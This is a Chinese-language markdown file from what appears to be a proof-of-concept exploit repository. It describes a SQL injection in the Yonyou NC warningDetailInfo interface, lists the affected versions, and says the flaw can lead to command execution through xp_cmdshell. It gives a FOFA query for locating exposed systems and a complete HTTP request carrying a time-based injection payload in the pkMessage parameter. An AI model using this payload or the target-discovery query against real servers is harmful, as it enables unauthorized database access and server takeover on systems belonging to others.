POC/wpoc/用友OA/用友NC-warningDetailInfo接口存在SQL注入漏洞.md
eeeeeeeeee-code 06c8413e64 first commit
2025-03-04 23:12:57 +08:00

937 B
Raw Blame History

用友NC-warningDetailInfo接口存在SQL注入漏洞

用友NC /ebvp/infopub/warningDetailInfo接口存在SQL注入漏洞攻击者通过利用SQL注入漏洞配合数据库xp_cmdshell可以执行任意命令从而控制服务器。经过分析与研判该漏洞利用难度低建议尽快修复。

影响范围NC63、NC633、NC65

fofa

app="用友-UFIDA-NC"

poc

GET /ebvp/infopub/warningDetailInfo?pageId=login&pkMessage=1'waitfor+delay+'0:0:5'-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

用友NC warningDetailInfo接口存在SQL注入漏洞